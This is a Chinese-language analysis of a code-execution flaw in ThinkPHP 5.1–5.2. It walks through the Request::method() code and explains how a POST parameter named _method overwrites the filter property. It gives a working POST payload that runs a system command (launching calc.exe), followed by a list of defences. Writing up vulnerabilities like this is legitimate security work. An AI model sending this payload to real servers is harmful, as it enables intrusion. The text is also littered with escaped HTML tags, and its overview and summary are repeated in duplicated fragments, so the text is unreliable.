ThinkPHP 5.1 ~ 5.2 全版本代码执行漏洞分析<\/h1>

漏洞概述<\/h2>
ThinkPHP 5.1 至 5.2 全版本在生产环境下存在代码执行漏洞，攻击者可以通过精心构造的请求实现任意代码执行。<\/p>

漏洞位置<\/h2>
漏洞位于 `thinkphp\/library\/think\/Request.php<\/code> 文件中的 method()<\/code> 方法。<\/p>`

漏洞分析<\/h2>
关键代码<\/h3>
public<\/span> function<\/span> method<\/span>($origin =<\/span> false<\/span>) {
<\/span><\/span>    if<\/span> ($origin) {
<\/span><\/span>        \/\/ 获取原始请求类型
<\/span><\/span><\/span><\/span>        return<\/span> $this-><\/span>server<\/span>('REQUEST_METHOD'<\/span>) ?:<\/span> 'GET'<\/span>;
<\/span><\/span>    } elseif<\/span> (!<\/span>$this-><\/span>method<\/span>) {
<\/span><\/span>        if<\/span> (isset<\/span>($_POST[$this-><\/span>config<\/span>['var_method'<\/span>]])) {
<\/span><\/span>            $this-><\/span>method<\/span> =<\/span> strtoupper<\/span>($_POST[$this-><\/span>config<\/span>['var_method'<\/span>]]);
<\/span><\/span>            $method =<\/span> strtolower<\/span>($this-><\/span>method<\/span>);
<\/span><\/span>            $this-><\/span>{$method} =<\/span> $_POST;
<\/span><\/span>        } elseif<\/span> ($this-><\/span>server<\/span>('HTTP_X_HTTP_METHOD_OVERRIDE'<\/span>)) {
<\/span><\/span>            $this-><\/span>method<\/span> =<\/span> strtoupper<\/span>($this-><\/span>server<\/span>('HTTP_X_HTTP_METHOD_OVERRIDE'<\/span>));
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            $this-><\/span>method<\/span> =<\/span> $this-><\/span>server<\/span>('REQUEST_METHOD'<\/span>) ?:<\/span> 'GET'<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $this-><\/span>method<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>

当 $origin<\/code> 为 false 且 $this->method<\/code> 为空时，会检查 $_POST[$this->config['var_method']]<\/code> 是否存在<\/li>
$this->config['var_method']<\/code> 默认值为 _method<\/code><\/li>
攻击者可以通过 POST 参数 _method<\/code> 控制 $this->method<\/code> 的值<\/li>
然后通过 $method = strtolower($this->method)<\/code> 和 $this->{$method} = $_POST<\/code> 实现变量覆盖<\/li>
<\/ol>
漏洞利用<\/h2>
变量覆盖<\/h3>
通过构造特殊的 _method<\/code> 参数，可以覆盖 $filter<\/code> 属性值：<\/p>
c=exec&f=calc.exe&&_method=filter&
<\/code><\/pre>
实际利用条件<\/h3>

默认情况下会爆出警告级别的异常，导致程序终止<\/li>
如果项目配置中设置了忽略异常提示（这是生产环境的常见配置），则可以利用成功<\/li>
<\/ol>
Payload示例<\/h3>
POST请求内容：<\/p>
_method=filter&c=exec&f=calc.exe
<\/code><\/pre>
这个payload会尝试执行系统命令，弹出计算器程序。<\/p>
防御措施<\/h2>

升级到官方修复版本<\/li>
对 _method<\/code> 参数进行严格过滤<\/li>
避免在生产环境中完全关闭错误提示<\/li>
对输入参数进行严格过滤和验证<\/li>
<\/ol>
总结<\/h2>
该漏洞利用ThinkPHP框架中Request类的变量覆盖特性，通过精心构造的POST请求实现任意代码执行。由于生产环境通常会关闭错误提示，使得该漏洞在实际环境中更容易被利用。<\/p>

ThinkPHP 5.1 ~ 5.2 全版本代码执行漏洞分析<\/h1>

漏洞概述<\/h2> ThinkPHP 5.1 至 5.2 全版本在生产环境下存在代码执行漏洞，攻击者可以通过精心构造的请求实现任意代码执行。<\/p>

漏洞位置<\/h2> 漏洞位于 thinkphp\/library\/think\/Request.php<\/code> 文件中的 method()<\/code> 方法。<\/p>

漏洞利用<\/h2>

总结<\/h2> 该漏洞利用ThinkPHP框架中Request类的变量覆盖特性，通过精心构造的POST请求实现任意代码执行。由于生产环境通常会关闭错误提示，使得该漏洞在实际环境中更容易被利用。<\/p>

漏洞概述<\/h2>
ThinkPHP 5.1 至 5.2 全版本在生产环境下存在代码执行漏洞，攻击者可以通过精心构造的请求实现任意代码执行。<\/p>

漏洞位置<\/h2>
漏洞位于 `thinkphp\/library\/think\/Request.php<\/code> 文件中的 method()<\/code> 方法。<\/p>`

总结<\/h2>
该漏洞利用ThinkPHP框架中Request类的变量覆盖特性，通过精心构造的POST请求实现任意代码执行。由于生产环境通常会关闭错误提示，使得该漏洞在实际环境中更容易被利用。<\/p>